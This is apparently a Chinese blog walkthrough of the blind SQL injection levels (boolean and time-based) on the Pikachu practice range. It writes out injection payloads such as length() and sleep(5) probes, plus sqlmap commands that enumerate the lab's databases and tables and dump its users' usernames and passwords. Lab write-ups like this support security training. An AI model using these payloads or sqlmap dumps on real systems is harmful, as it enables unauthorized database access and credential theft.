[Pikachu靶场实战系列] SQL注入(盲注)

目录

  • 盲注
    • 布尔盲注
    • 时间盲注

盲注

盲注的意思就是说页面没有明显的回显,我们只能通过其他方式判断注入点。
常见的方式有两种,一种是布尔盲注,通过页面返回的不同状态判断语句是否被执行。另一种是时间盲注,通过页面加载时间来判断语句是否被执行。

布尔盲注

[Pikachu靶场实战系列] SQL注入(盲注)_第1张图片
先输入一个之前关卡中的名字,返回正常
[Pikachu靶场实战系列] SQL注入(盲注)_第2张图片
加上单引号,并没有报错,而是返回了我输入的信息不存在
[Pikachu靶场实战系列] SQL注入(盲注)_第3张图片
加上注释符号后,返回又正常了,说明注入点存在,且就是单引号闭合
[Pikachu靶场实战系列] SQL注入(盲注)_第4张图片
判断数据库名的长度

lucy’and length(database())>=1 #

[Pikachu靶场实战系列] SQL注入(盲注)_第5张图片

lucy’and length(database())>=7 #

[Pikachu靶场实战系列] SQL注入(盲注)_第6张图片

lucy’and length(database())>=8 #

[Pikachu靶场实战系列] SQL注入(盲注)_第7张图片
说明数据库长度为7,根据之前的关卡,数据库为pikachu,确实长度为7。接下来要爆破数据库的名字,要一个字母一个字母爆破,手动爆破是十分复杂和耗费时间的。所以我们可以使用sqlmap工具或是自己写脚本进行爆破。

我这里使用sqlmap
查询数据库名:

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_b.php?name=lucy&submit=查询” --current-db

[Pikachu靶场实战系列] SQL注入(盲注)_第8张图片
爆表

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_b.php?name=lucy&submit=查询” -D pikachu --tables

[Pikachu靶场实战系列] SQL注入(盲注)_第9张图片
爆users表的列

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_b.php?name=lucy&submit=查询” -D pikachu -T users --columns

[Pikachu靶场实战系列] SQL注入(盲注)_第10张图片
爆username 和password的值
在这里插入图片描述

时间盲注

输入lucy
[Pikachu靶场实战系列] SQL注入(盲注)_第11张图片
加上单引号
[Pikachu靶场实战系列] SQL注入(盲注)_第12张图片
返回结果都一样,这样怎么判断是否有注入点呢?我们可以采用时间注入的方式。

使用下面的pyload,点击查询后,过5s页面才返回下面的一句话,说明sleep(5)被执行了,说明页面可以执行我们构造的语句,只是没有回显,那么我们就可以用类似布尔盲注的方法进行时间盲注,报错出所要查询的信息。

lucy’ and sleep(5) #

[Pikachu靶场实战系列] SQL注入(盲注)_第13张图片
还是使用salmap
爆出所有的数据库

python sqlmap.py -u “http://5749b9ee554a4ddb941b425ad59d8ced.app.mituan.zone/vul/sqli/sqli_blind_t.php?name=lucy&submit=%E6%9F%A5%E8%AF%A2” --dbs

[Pikachu靶场实战系列] SQL注入(盲注)_第14张图片
pyload和布尔盲注一样,不得不说,sqlmap真好用。剩下的就不举例了,参考之前的即可。

你可能感兴趣的:(漏洞复现)